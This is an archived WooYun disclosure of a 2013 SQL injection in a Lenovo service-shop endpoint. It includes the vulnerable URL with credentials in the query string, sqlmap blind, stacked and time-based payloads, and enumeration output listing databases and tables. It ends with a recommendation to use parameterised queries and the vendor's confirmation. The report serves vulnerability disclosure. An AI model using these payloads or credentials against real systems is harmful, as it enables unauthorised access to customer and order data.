乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-10-23: 细节已通知厂商并且等待厂商处理中 2013-10-25: 厂商已经确认,细节仅向厂商公开 2013-11-04: 细节向核心白帽子及相关领域专家公开 2013-11-14: 细节向普通白帽子公开 2013-11-24: 细节向实习白帽子公开 2013-12-07: 细节向公众公开
一个很普通的注射,不过数据还是不少的。
http://serviceshop.lenovo.com.cn/WebAjaxHelper.ashx?commentsno=ab637223-3828-473c-a2be-058e346ec925&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused
Place: GETParameter: commentsno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: commentsno=ab637223-3828-473c-a2be-058e346ec925' AND 6576=6576 AND'kKEa'='kKEa&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815 Vector: AND [INFERENCE] Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: commentsno=ab637223-3828-473c-a2be-058e346ec925'; WAITFOR DELAY '0:0:5'--&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815 Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: commentsno=ab637223-3828-473c-a2be-058e346ec925' WAITFOR DELAY '0:0:5'--&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815 Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
current user: 'web_serviceshop'current database: 'ServiceShop'
available databases [21]:[*] CACHE_PSCM[*] EUSSCMS[*] ibis[*] ideacms[*] ideaDriver[*] LB[*] master[*] model[*] msdb[*] Pccarer[*] PremiumATDB[*] ProductDB[*] ServiceShop[*] StaWeb[*] tempdb[*] thinkcms[*] thinkDriver[*] wsbx[*] wsi_priv[*] WSICMS[*] wsidb
[16:06:12] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008[16:06:12] [INFO] fetching database names[16:06:12] [INFO] fetching number of databases[16:06:12] [INFO] resumed: 21[16:06:12] [INFO] resumed: CACHE_PSCM[16:06:12] [INFO] resumed: EUSSCMS[16:06:12] [INFO] resumed: ibis[16:06:12] [INFO] resumed: ideacms[16:06:12] [INFO] resumed: ideaDriver[16:06:12] [INFO] resumed: LB[16:06:12] [INFO] resumed: master[16:06:12] [INFO] resumed: model[16:06:12] [INFO] resumed: msdb[16:06:12] [INFO] resumed: Pccarer[16:06:12] [INFO] resumed: PremiumATDB[16:06:12] [INFO] resumed: ProductDB[16:06:12] [INFO] resumed: ServiceShop[16:06:12] [INFO] resumed: StaWeb[16:06:12] [INFO] resumed: tempdb[16:06:12] [INFO] resumed: thinkcms[16:06:12] [INFO] resumed: thinkDriver[16:06:12] [INFO] resumed: wsbx[16:06:12] [INFO] resumed: wsi_priv[16:06:12] [INFO] resumed: WSICMS[16:06:12] [INFO] resumed: wsidb[16:06:13] [INFO] resumed: 0[16:06:13] [INFO] fetching number of tables for database 'tempdb'[16:06:13] [INFO] resumed: 0[16:06:13] [INFO] fetching number of tables for database 'LB'[16:06:13] [INFO] retrieved:[16:06:13] [INFO] retrieved:[16:06:14] [INFO] resumed: 0[16:06:14] [INFO] fetching number of tables for database 'wsidb'[16:06:14] [INFO] retrieved:[16:06:14] [INFO] retrieved:[16:06:14] [INFO] resumed: 0[16:06:14] [INFO] fetching number of tables for database 'wsi_priv'[16:06:14] [INFO] retrieved:[16:06:14] [INFO] retrieved:[16:06:15] [INFO] resumed: 0[16:06:15] [INFO] fetching number of tables for database 'PremiumATDB'[16:06:15] [INFO] retrieved:[16:06:15] [INFO] retrieved:[16:06:15] [INFO] resumed: 0[16:06:15] [INFO] fetching number of tables for database 'ProductDB'[16:06:15] [INFO] retrieved:[16:06:15] [INFO] retrieved:[16:06:15] [INFO] resumed: 0[16:06:15] [INFO] fetching number of tables for database 'CACHE_PSCM'[16:06:15] [INFO] retrieved:[16:06:16] [INFO] retrieved:[16:06:16] [INFO] resumed: 0[16:06:16] [INFO] fetching number of tables for database 'ServiceShop'[16:06:16] [INFO] resumed: 81[16:06:16] [INFO] resumed: dbo.ACT_WenDa[16:06:16] [INFO] resumed: dbo.EP_ClassProductRelation[16:06:16] [INFO] resumed: dbo.EP_CodeDef[16:06:16] [INFO] resumed: dbo.EP_CodeDef_temp[16:06:16] [INFO] resumed: dbo.EP_HomePageProd[16:06:16] [INFO] resumed: dbo.EP_PassCode[16:06:16] [INFO] resumed: dbo.EP_PassCode_temp[16:06:16] [INFO] resumed: dbo.EP_Promotion[16:06:16] [INFO] resumed: dbo.EP_Promotion_temp[16:06:16] [INFO] resumed: dbo.EP_PromotionProduct[16:06:16] [INFO] resumed: dbo.EP_PromotionProduct_temp[16:06:16] [INFO] resumed: dbo.EP_ServiceProductPrice[16:06:16] [INFO] resumed: dbo.EP_ServiceProductPrice_temp[16:06:16] [INFO] resumed: dbo.EP_ServiceProductRel[16:06:16] [INFO] resumed: dbo.EP_ServiceProductSale[16:06:16] [INFO] resumed: dbo.EP_ServiceProductSale_bak_20130607[16:06:16] [INFO] resumed: dbo.EP_ServiceProductSale_temp[16:06:16] [INFO] resumed: dbo.MD_ServiceProduct[16:06:16] [INFO] resumed: dbo.MD_ServiceProduct_20130124[16:06:16] [INFO] resumed: dbo.MD_ServiceProduct_temp[16:06:16] [INFO] resumed: dbo.SS_Agreement[16:06:16] [INFO] resumed: dbo.SS_Attachments[16:06:16] [INFO] resumed: dbo.SS_BigClass[16:06:16] [INFO] resumed: dbo.SS_BigSmallClassRel[16:06:16] [INFO] resumed: dbo.SS_Cart[16:06:16] [INFO] resumed: dbo.SS_CartItem[16:06:16] [INFO] resumed: dbo.SS_ClassInfo[16:06:16] [INFO] resumed: dbo.SS_ClassProduct[16:06:16] [INFO] resumed: dbo.SS_ClassPromotionExt[16:06:16] [INFO] resumed: dbo.SS_Collection[16:06:16] [INFO] resumed: dbo.SS_Could_Requests[16:06:16] [INFO] resumed: dbo.SS_Delivery[16:06:16] [INFO] resumed: dbo.SS_DictionaryValue[16:06:16] [INFO] resumed: dbo.SS_DiscountRecord[16:06:16] [INFO] resumed: dbo.SS_ErrorLog[16:06:16] [INFO] resumed: dbo.SS_Evaluation[16:06:16] [INFO] resumed: dbo.SS_EvaluationReply[16:06:16] [INFO] resumed: dbo.SS_Explain[16:06:16] [INFO] resumed: dbo.SS_FeedBack[16:06:16] [INFO] resumed: dbo.SS_GroupInfo[16:06:16] [INFO] resumed: dbo.SS_GroupProduct[16:06:16] [INFO] resumed: dbo.SS_GroupPurchase[16:06:16] [INFO] resumed: dbo.SS_Invoice[16:06:16] [INFO] resumed: dbo.SS_LimitBuy[16:06:16] [INFO] resumed: dbo.SS_LoginLog[16:06:16] [INFO] resumed: dbo.SS_MyDiscount[16:06:16] [INFO] resumed: dbo.SS_News[16:06:16] [INFO] resumed: dbo.SS_PayLog[16:06:16] [INFO] resumed: dbo.SS_PointsDiscount[16:06:16] [INFO] resumed: dbo.SS_PointsRecord[16:06:16] [INFO] resumed: dbo.SS_PointsRule[16:06:16] [INFO] resumed: dbo.SS_PromExtItem[16:06:16] [INFO] resumed: dbo.SS_PromotionExt[16:06:16] [INFO] resumed: dbo.SS_SaleOrder[16:06:16] [INFO] resumed: dbo.SS_SaleOrderLine[16:06:16] [INFO] resumed: dbo.SS_SerchDictionary[16:06:16] [INFO] resumed: dbo.SS_ServiceCouponInfo[16:06:16] [INFO] resumed: dbo.SS_ServiceLucky[16:06:16] [INFO] resumed: dbo.SS_ServicePrizeDetail[16:06:16] [INFO] resumed: dbo.SS_ServiceProductAgreement[16:06:16] [INFO] resumed: dbo.SS_ServiceProductExt[16:06:16] [INFO] resumed: dbo.SS_SmallClass[16:06:16] [INFO] resumed: dbo.SS_SmallClassProduct[16:06:16] [INFO] resumed: dbo.SS_UserPoints[16:06:16] [INFO] resumed: dbo.SS_Value[16:06:16] [INFO] resumed: dbo.SS_VIP_User[16:06:16] [INFO] resumed: dbo.SS_VIP_User2[16:06:16] [INFO] resumed: dbo.SS_VisitLog[16:06:16] [INFO] resumed: dbo.SS_VM_GroupPurchase_Order[16:06:16] [INFO] resumed: dbo.SS_VM_LimitBuy_cs_Order[16:06:16] [INFO] resumed: dbo.SS_VW_BianJiBuChongProduct[16:06:16] [INFO] resumed: dbo.SS_VW_Evaluation[16:06:16] [INFO] resumed: dbo.SS_VW_GroupProduct[16:06:16] [INFO] resumed: dbo.SS_VW_ProductExt[16:06:16] [INFO] resumed: dbo.SS_VW_PromotionBuy[16:06:16] [INFO] resumed: dbo.SS_VW_SmallClassProduct[16:06:16] [INFO] resumed: dbo.SS_WebserviceLog[16:06:16] [INFO] resumed: dbo.SS_WebServiceRules[16:06:16] [INFO] resumed: dbo.tbl_Zone[16:06:16] [INFO] resumed: dbo.tbl_Zone_20121112[16:06:16] [INFO] resumed: dbo.tbl_Zone_temp[16:06:16] [INFO] fetching number of tables for database 'ibis'[16:06:16] [INFO] retrieved:[16:06:16] [INFO] retrieved:[16:06:17] [INFO] resumed: 0[16:06:17] [INFO] fetching number of tables for database 'EUSSCMS'[16:06:17] [INFO] retrieved:[16:06:17] [INFO] retrieved:[16:06:17] [INFO] resumed: 0[16:06:17] [INFO] fetching number of tables for database 'master'[16:06:17] [INFO] resumed: 363[16:06:17] [INFO] resumed: dbo.spt_fallback_db[16:06:17] [INFO] resumed: dbo.spt_fallback_dev[16:06:17] [INFO] resumed: dbo.spt_fallback_usg[16:06:17] [INFO] resumed: dbo.spt_monitor[16:06:17] [INFO] resumed: dbo.spt_values[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.CHECK_CONSTRAINTS[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.COLUMN_PRIVILEGES[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.COLUMNS[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.DOMAINS[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.KEY_COLUMN_USAGE[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.PARAMETERS[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.ROUTINE_COLUMNS[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.ROUTINES[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.SCHEMATA[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.TABLE_CONSTRAINTS[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.TABLE_PRIVILEGES[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.TABLES[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.VIEW_COLUMN_USAGE[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.VIEW_TABLE_USAGE[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.VIEWS[16:06:17] [INFO] resumed: sys.all_columns[16:06:17] [INFO] resumed: sys.all_objects[16:06:17] [INFO] resumed: sys.all_parameters[16:06:17] [INFO] resumed: sys.all_sql_modules[16:06:17] [INFO] resumed: sys.all_views[16:06:17] [INFO] resumed: sys.allocation_units[16:06:17] [INFO] resumed: sys.assemblies[16:06:17] [INFO] resuming partial value: sys.assembly_f
表太多啦,我就不慢慢跑了。
过滤或者参数化查询哦亲
危害等级:高
漏洞Rank:15
确认时间:2013-10-25 10:44
感谢您对联想安全做出的贡献!我们将立即评估与修复相关漏洞
暂无